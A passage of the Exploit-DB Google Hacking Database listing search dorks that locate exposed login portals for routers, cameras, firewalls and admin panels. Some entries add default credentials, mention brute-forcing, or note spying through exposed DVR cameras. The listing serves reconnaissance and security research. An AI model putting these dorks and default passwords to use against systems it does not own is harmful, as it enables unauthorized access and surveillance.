<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Check Point - Login&quot;</shortDescription>
<textualDescription>intitle:&quot;Check Point - Login&quot;
This dork found checkpoint login panel.
Author : Ismail Tasdelen
</textualDescription>
<query>intitle:&quot;Check Point - Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Check Point - Login&quot;</querystring>
<edb></edb>
<date>2019-12-30</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>1059</id>
<link>https://www.exploit-db.com/ghdb/1059</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Cisco CallManager User Options Log On&quot; &quot;Please enter your User ID and Password in the spaces provided below and click the Log On button to co</shortDescription>
<textualDescription>[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users â€ââ¬Å“Logon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID – your UWYO Domain username* Password – initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager</textualDescription>
<query>intitle:&quot;Cisco CallManager User Options Log On&quot; &quot;Please enter your User ID and Password in the spaces provided below and click the Log On button to co</query>
<querystring>https://www.google.com/search?q=intitle:%22Cisco+CallManager+User+Options+Log+On%22+%22Please+enter+your+User+ID+and+Password+in+the+spaces+provided+below+and+click+the+Log+On+button+to+continue.%22++-edu&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6779</id>
<link>https://www.exploit-db.com/ghdb/6779</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Cisco Email Security Virtual Appliance&quot; inurl:csrfkey=</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Cisco Email Security Virtual Appliance&quot; inurl:csrfkey=
# Cisco Email Security Virtual Appliance login portals.
# Date: 3/2/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Cisco Email Security Virtual Appliance&quot; inurl:csrfkey=</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Cisco Email Security Virtual Appliance&quot; inurl:csrfkey=</querystring>
<edb></edb>
<date>2021-02-05</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3859</id>
<link>https://www.exploit-db.com/ghdb/3859</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Cisco Integrated Management Controller Login&quot;</shortDescription>
<textualDescription>intitle:&quot;Cisco Integrated Management Controller Login&quot;
The Cisco Integrated Management Controller (CIMC) is the management service
for the C-Series servers. CIMC is built into the motherboard. This Google
dork searches for the CIMC GUI login portal for remote access.
ax_</textualDescription>
<query>intitle:&quot;Cisco Integrated Management Controller Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Cisco Integrated Management Controller Login&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>7486</id>
<link>https://www.exploit-db.com/ghdb/7486</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;CMS&quot; inurl:&quot;login.jsp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;CMS&quot; inurl:&quot;login.jsp&quot;
# Pages Containing Login Portals
# Date:25/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;CMS&quot; inurl:&quot;login.jsp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CMS&quot; inurl:&quot;login.jsp&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7472</id>
<link>https://www.exploit-db.com/ghdb/7472</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;CMS&quot; inurl:&quot;login.php&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;CMS&quot; inurl:&quot;login.php&quot;
# Pages Containing Login Portals
# Date:21/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;CMS&quot; inurl:&quot;login.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;CMS&quot; inurl:&quot;login.php&quot;</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7281</id>
<link>https://www.exploit-db.com/ghdb/7281</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Codian MCU - login&quot; &quot;Copyright TANDBERG&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Codian MCU - login&quot; &quot;Copyright TANDBERG&quot;
# Pages Containing Login Portals
# Date: 18/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;Codian MCU - login&quot; &quot;Copyright TANDBERG&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Codian MCU - login&quot; &quot;Copyright TANDBERG&quot;</querystring>
<edb></edb>
<date>2021-09-23</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>164</id>
<link>https://www.exploit-db.com/ghdb/164</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ColdFusion Administrator Login&quot;</shortDescription>
<textualDescription>This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server.</textualDescription>
<query>intitle:&quot;ColdFusion Administrator Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ColdFusion+Administrator+Login%22</querystring>
<edb></edb>
<date>2004-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1067</id>
<link>https://www.exploit-db.com/ghdb/1067</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;communigate pro * *&quot; intitle:&quot;entrance&quot;</shortDescription>
<textualDescription>Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. The directory link from this page can in some instances be used to query user information.</textualDescription>
<query>intitle:communigate pro entrance</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=intitle%3A%22communigate+pro+*+*%22+intitle%3A%22entrance%22</querystring>
<edb></edb>
<date>2005-08-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6846</id>
<link>https://www.exploit-db.com/ghdb/6846</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Component Browser Login&quot;</shortDescription>
<textualDescription># Exploit Title: Adobe Coldfusion login portal
# Google Dork: intitle:&quot;Component Browser Login&quot;
# Author: Kitchaphan Singchai (idealphase)
# Category: Pages Containing Login Portals
</textualDescription>
<query>intitle:&quot;Component Browser Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Component Browser Login&quot;</querystring>
<edb></edb>
<date>2021-03-26</date>
<author>idealphase</author>
</entry>
<entry>
<id>3896</id>
<link>https://www.exploit-db.com/ghdb/3896</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Comrex ACCESS Rack&quot;</shortDescription>
<textualDescription>IP Codecs offering &quot;studio quality audio and video over wired and
wireless IP circuits&quot;. Used in studio-grade radio broadcasting over the
web. More product information here: http://www.comrex.com/products.html.
This Google search will return (some, but not hundreds of) web-facing
login portals for this type of device. Requires JavaScript and Flash for
viewer to work. Default login: comrex comrex.
4N6 Security</textualDescription>
<query>intitle:&quot;Comrex ACCESS Rack&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Comrex ACCESS Rack&quot;</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>1081</id>
<link>https://www.exploit-db.com/ghdb/1081</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Content Management System&quot; &quot;user name&quot;|&quot;password&quot;|&quot;admin&quot; &quot;Microsoft IE 5.5&quot; -mambo -johnny.ihackstuff</shortDescription>
<textualDescription>iCMS - Content Management System...Create websites without knowing HTML or web programming.</textualDescription>
<query>intitle:&quot;Content Management System&quot; &quot;user name&quot;|&quot;password&quot;|&quot;admin&quot; &quot;Microsoft IE 5.5&quot; -mambo -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1102</id>
<link>https://www.exploit-db.com/ghdb/1102</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Content Management System&quot; &quot;user name&quot;|&quot;password&quot;|&quot;admin&quot; &quot;Microsoft IE 5.5&quot; -mambo -johnny.ihackstuff</shortDescription>
<textualDescription>iCMS - Content Management System...Create dynamic interactive websites in minutes without knowing HTML or web programming. iCMS is a perfect balance of ease of use, flexibility, and power. If you are a Web Developer, you can dramatically decrease your Website development time, decrease your costs and deliver a product that will yield higher profits with less maintenance required!Dont think there are any vulns attached to this</textualDescription>
<query>intitle:&quot;Content Management System&quot; &quot;user name&quot;|&quot;password&quot;|&quot;admin&quot; &quot;Microsoft IE 5.5&quot; -mambo -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle:%22Content+Management+System%22+%22user+name%22%7C%22password%22%7C%22admin%22+%22Microsoft+IE+5.5%22+-mambo+-johnny.ihackstuff&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>4714</id>
<link>https://www.exploit-db.com/ghdb/4714</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Control Panel&quot; + emailmarketer</shortDescription>
<textualDescription>intitle:&quot;Control Panel&quot; + emailmarketer
Email Marketer login panel
ManhNho
</textualDescription>
<query>intitle:&quot;Control Panel&quot; + emailmarketer</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Control Panel&quot; + emailmarketer</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>ManhNho</author>
</entry>
<entry>
<id>8301</id>
<link>https://www.exploit-db.com/ghdb/8301</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;cs141 webmanager&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;cs141 webmanager&quot;
# Pages Containing Login Portals
# Date: 01/11/2023
# Exploit: Louise E</textualDescription>
<query>intitle:&quot;cs141 webmanager&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;cs141 webmanager&quot;</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Louise E</author>
</entry>
<entry>
<id>3720</id>
<link>https://www.exploit-db.com/ghdb/3720</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;cyber recruiter&quot; &quot;User ID&quot;</shortDescription>
<textualDescription>Search for login screen of default instance: Cyber Recruiter (applicant
tracking and recruiting software)</textualDescription>
<query>intitle:&quot;cyber recruiter&quot; &quot;User ID&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;cyber recruiter&quot; &quot;User ID&quot;</querystring>
<edb></edb>
<date>2011-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>6475</id>
<link>https://www.exploit-db.com/ghdb/6475</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN&quot;
# D-LINK Wireless AP login portals.
# Date: 11/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN&quot;</querystring>
<edb></edb>
<date>2020-08-11</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6784</id>
<link>https://www.exploit-db.com/ghdb/6784</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME&quot; inurl:&quot;status.php&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME&quot; inurl:&quot;status.php&quot;</textualDescription>
<query>intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME&quot; inurl:&quot;status.php&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-LINK SYSTEMS, INC. | WIRELESS ROUTER | HOME&quot; inurl:&quot;status.php&quot;</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4210</id>
<link>https://www.exploit-db.com/ghdb/4210</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;D-Link VoIP Router&quot; &quot;Welcome&quot;</shortDescription>
<textualDescription>Description: D-Link VoIP Router login page
Google search: intitle:&quot;D-Link VoIP Router&quot; &quot;Welcome&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;D-Link VoIP Router&quot; &quot;Welcome&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-Link VoIP Router&quot; &quot;Welcome&quot;</querystring>
<edb></edb>
<date>2016-03-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7209</id>
<link>https://www.exploit-db.com/ghdb/7209</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;D-link&quot; intext:&quot;SharePort Web Access&quot; &quot;Hardware Version&quot; &quot;Firmware Version&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;D-link&quot; intext:&quot;SharePort Web Access&quot; &quot;Hardware Version&quot; &quot;Firmware Version&quot;
# Pages Containing Login Portals
# Date: 10/09/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;D-link&quot; intext:&quot;SharePort Web Access&quot; &quot;Hardware Version&quot; &quot;Firmware Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-link&quot; intext:&quot;SharePort Web Access&quot; &quot;Hardware Version&quot; &quot;Firmware Version&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>6479</id>
<link>https://www.exploit-db.com/ghdb/6479</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;D-LINK&quot; inurl:Login.html</shortDescription>
<textualDescription># Google Dork: intitle:&quot;D-LINK&quot; inurl:Login.html
# D-LINK router login portals.
# Date: 11/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;D-LINK&quot; inurl:Login.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;D-LINK&quot; inurl:Login.html</querystring>
<edb></edb>
<date>2020-08-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>232</id>
<link>https://www.exploit-db.com/ghdb/232</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Dell Remote Access Controller&quot;</shortDescription>
<textualDescription>This is the Dell Remote Access Controller that allows remote administration of a Dell server.</textualDescription>
<query>intitle:&quot;Dell Remote Access Controller&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Dell+Remote+Access+Controller%22</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4509</id>
<link>https://www.exploit-db.com/ghdb/4509</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Dell SonicWALL - Authentication&quot;</shortDescription>
<textualDescription>Finds tons upon tons of Dell SonicWALL firewall servers
Dxtroyer</textualDescription>
<query>intitle:&quot;Dell SonicWALL - Authentication&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dell SonicWALL - Authentication&quot;</querystring>
<edb></edb>
<date>2017-06-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6526</id>
<link>https://www.exploit-db.com/ghdb/6526</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Dell SonicWALL - Authentication&quot; inurl:auth.html</shortDescription>
<textualDescription>Google Dork: intitle:&quot;Dell SonicWALL - Authentication&quot; inurl:auth.html
Description: This Google Dork is used for detecting/fetching login pages of
Dell based SonicWALL firewall devices.
Author: Sibi Mathew George
</textualDescription>
<query>intitle:&quot;Dell SonicWALL - Authentication&quot; inurl:auth.html</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dell SonicWALL - Authentication&quot; inurl:auth.html</querystring>
<edb></edb>
<date>2020-09-09</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>7354</id>
<link>https://www.exploit-db.com/ghdb/7354</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Dericam&quot; &quot;Remember Me&quot;</shortDescription>
<textualDescription>#Google Dork: intitle:&quot;Dericam&quot; &quot;Remember Me&quot;
# Pages Containing Login Portals
# Date: 30/08/2021
# Exploit Author: Neha Singh</textualDescription>
<query>intitle:&quot;Dericam&quot; &quot;Remember Me&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dericam&quot; &quot;Remember Me&quot;</querystring>
<edb></edb>
<date>2021-09-30</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>7073</id>
<link>https://www.exploit-db.com/ghdb/7073</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DEVICE&quot; &quot;Real-time IP Camera Monitoring System&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;DEVICE&quot; &quot;Real-time IP Camera Monitoring System&quot;
# Category: Various Online Devices
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;DEVICE&quot; &quot;Real-time IP Camera Monitoring System&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DEVICE&quot; &quot;Real-time IP Camera Monitoring System&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>8003</id>
<link>https://www.exploit-db.com/ghdb/8003</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Device(IP CAMERA)&quot; &quot;language&quot; -com|net</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Device(IP CAMERA)&quot; &quot;language&quot; -com|net
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intitle:&quot;Device(IP CAMERA)&quot; &quot;language&quot; -com|net</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Device(IP CAMERA)&quot; &quot;language&quot; -com|net</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7058</id>
<link>https://www.exploit-db.com/ghdb/7058</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DGS-3100 Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;DGS-3100 Login&quot;
# Category: Pages Containing Login Portals
# Date: 05/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intitle:&quot;DGS-3100 Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DGS-3100 Login&quot;</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6882</id>
<link>https://www.exploit-db.com/ghdb/6882</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DIAM4 Login&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;DIAM4 Login&quot;
# Pages Containing Login Portals(EMR Systems)
# Date: 15/04/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>intitle:&quot;DIAM4 Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DIAM4 Login&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>4215</id>
<link>https://www.exploit-db.com/ghdb/4215</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DirectAdmin Login&quot; &quot;Please enter your Username and Password&quot;</shortDescription>
<textualDescription>Description: DirectAdmin Web Control Panel login page
Google search: intitle:&quot;DirectAdmin Login&quot; &quot;Please enter your Username
and Password&quot;
Author: nebo_oben</textualDescription>
<query>intitle:&quot;DirectAdmin Login&quot; &quot;Please enter your Username and Password&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DirectAdmin Login&quot; &quot;Please enter your Username and Password&quot;</querystring>
<edb></edb>
<date>2016-03-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4602</id>
<link>https://www.exploit-db.com/ghdb/4602</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Django site admin&quot; inurl:admin -site:stackoverflow.com -site:github.com</shortDescription>
<textualDescription>Identify admin page for websites built with Python Django framework
Sreeram Sasikumar
</textualDescription>
<query>intitle:&quot;Django site admin&quot; inurl:admin -site:stackoverflow.com -site:github.com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Django site admin&quot; inurl:admin -site:stackoverflow.com -site:github.com</querystring>
<edb></edb>
<date>2017-10-30</date>
<author>Sreeram Sasikumar</author>
</entry>
<entry>
<id>1170</id>
<link>https://www.exploit-db.com/ghdb/1170</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Docutek ERes - Admin Login&quot; -edu</shortDescription>
<textualDescription>Docutek Eres is software that helps libaries get an internet end to them. This dork finds the admin login in page. Using Docutek Eres you can look through course material amoung other things.</textualDescription>
<query>intitle:&quot;Docutek ERes - Admin Login&quot; -edu</query>
<querystring>https://www.google.com/search?q=intitle:%22Docutek+ERes+-+Admin+Login%22+-edu&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2005-10-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6476</id>
<link>https://www.exploit-db.com/ghdb/6476</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DVR LOGIN&quot; -com</shortDescription>
<textualDescription>Google Dork: intitle:&quot;DVR LOGIN&quot; -com
Description: This google dork is useful for detecting all the login portals of DVR based devices.
Author: Sibi Mathew George
----
Sent using Guerrillamail.com
Block or report abuse: https://www.guerrillamail.com//abuse/?a=RU5mDh4gTLITmwu3vn0Qfw%3D%3D
</textualDescription>
<query>intitle:&quot;DVR LOGIN&quot; -com</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DVR LOGIN&quot; -com</querystring>
<edb></edb>
<date>2020-08-12</date>
<author>Sibi Mathew George</author>
</entry>
<entry>
<id>3798</id>
<link>https://www.exploit-db.com/ghdb/3798</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;DVR+Web+Client&quot;</shortDescription>
<textualDescription>This dork will find most Linux-based DVR web clients that are accessible to
the web and through SSH. Linux-based DVR web clients are login portals for
surveillance web cameras wherein you can spy in other peoples cameras.
*Default Usernames:* admin, guest, root
*Default Passwords:* admin, guest, root
*Author:* shipcode</textualDescription>
<query>intitle:&quot;DVR+Web+Client&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;DVR+Web+Client&quot;</querystring>
<edb></edb>
<date>2012-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5352</id>
<link>https://www.exploit-db.com/ghdb/5352</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;EdgeOS&quot; intext:&quot;Please login&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;EdgeOS&quot; intext:&quot;Please login&quot;
Author: M. Cory Billington
Info: Contains login portals for Ubiquiti devices running EdgeOS
</textualDescription>
<query>intitle:&quot;EdgeOS&quot; intext:&quot;Please login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;EdgeOS&quot; intext:&quot;Please login&quot;</querystring>
<edb></edb>
<date>2019-08-15</date>
<author>M. Cory Billington</author>
</entry>
<entry>
<id>1351</id>
<link>https://www.exploit-db.com/ghdb/1351</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Employee Intranet Login&quot;</shortDescription>
<textualDescription>Intranet login pages by decentrix.com</textualDescription>
<query>intitle:&quot;Employee Intranet Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Employee+Intranet+Login%22&amp;num=100&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7493</id>
<link>https://www.exploit-db.com/ghdb/7493</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Employee Login&quot; &amp; inurl:(&quot;login.aspx&quot; | &quot;login.asp&quot;)</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Employee Login&quot; &amp; inurl:(&quot;login.aspx&quot; | &quot;login.asp&quot;)
# Pages Containing Login Portals
# Date:26/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;Employee Login&quot; &amp; inurl:(&quot;login.aspx&quot; | &quot;login.asp&quot;)</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Employee Login&quot; &amp; inurl:(&quot;login.aspx&quot; | &quot;login.asp&quot;)</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Suman Das</author>
</entry>
<entry>
<id>218</id>
<link>https://www.exploit-db.com/ghdb/218</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;eMule *&quot; intitle:&quot;- Web Control Panel&quot; intext:&quot;Web Control Panel&quot; &quot;Enter your password here.&quot;</shortDescription>
<textualDescription>This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)</textualDescription>
<query>intitle:&quot;eMule *&quot; intitle:&quot;- Web Control Panel&quot; intext:&quot;Web Control Panel&quot; &quot;Enter your password here.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22eMule+*%22+intitle:%22-+Web+Control+Panel%22+intext:%22Web+Control+Panel%22+%22Enter+your+password+here.%22&amp;num=100&amp;c2coff=1&amp;filter=0</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3719</id>
<link>https://www.exploit-db.com/ghdb/3719</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Enabling Self-Service Procurement&quot;</shortDescription>
<textualDescription>Search for login screen of default instance: Puridiom (A Procurement Web
Application)</textualDescription>
<query>intitle:&quot;Enabling Self-Service Procurement&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Enabling Self-Service Procurement&quot;</querystring>
<edb></edb>
<date>2011-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>839</id>
<link>https://www.exploit-db.com/ghdb/839</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;ePowerSwitch Login&quot;</shortDescription>
<textualDescription>With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device.</textualDescription>
<query>intitle:&quot;ePowerSwitch Login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22ePowerSwitch+Login%22</querystring>
<edb></edb>
<date>2005-01-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6739</id>
<link>https://www.exploit-db.com/ghdb/6739</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;Exchange Log In&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Exchange Log In&quot;
# Description: Microsoft Exchange login page 2006
# Author: Saleh Al Zadjali (https://om.linkedin.com/in/saleh-alzadjali)
BR,
Saleh Al-Zadjali</textualDescription>
<query>intitle:&quot;Exchange Log In&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Exchange Log In&quot;</querystring>
<edb></edb>
<date>2021-01-05</date>
<author>Saleh Al Zadjali</author>
</entry>
<entry>
<id>1367</id>
<link>https://www.exploit-db.com/ghdb/1367</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;eXist Database Administration&quot; -demo</shortDescription>
<textualDescription>Login Pages &quot;eXist is an Open Source native XML database featuring efficient, index-based XQuery processing, automatic indexing, extensions for full-text search, XUpdate support and tight integration with existing XML development tools. The database implements the current XQuery 1.0 working draft as of November, 2003 (for the core syntax, some details already following later versions), with the exception of the XML schema related features.&quot;</textualDescription>
<query>intitle:&quot;eXist Database Administration&quot; -demo</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22eXist+Database+Administration%22+-demo</querystring>
<edb></edb>
<date>2006-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>1182</id>
<link>https://www.exploit-db.com/ghdb/1182</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;EXTRANET * - Identification&quot;</shortDescription>
<textualDescription>WorkZone Extranet Solution login page. All portals are in french or spanish I belive.</textualDescription>
<query>intitle:&quot;EXTRANET * - Identification&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22EXTRANET+*+-+Identification%22+-johnny.ihackstuff&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1183</id>
<link>https://www.exploit-db.com/ghdb/1183</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:&quot;EXTRANET login&quot; -.edu -.mil -.gov -johnny.ihackstuff</shortDescription>
<textualDescription>This search finds many different Extranet login pages.</textualDescription>
<query>intitle:&quot;EXTRANET login&quot; -.edu -.mil -.gov -johnny.ihackstuff</query>
<querystring>https://www.google.com/search?q=intitle:%22EXTRANET+login%22+-.edu+-.mil+-.gov+-johnny.ihackstuff&amp;num=100&amp;safe=off&amp;filter=0</querystring>
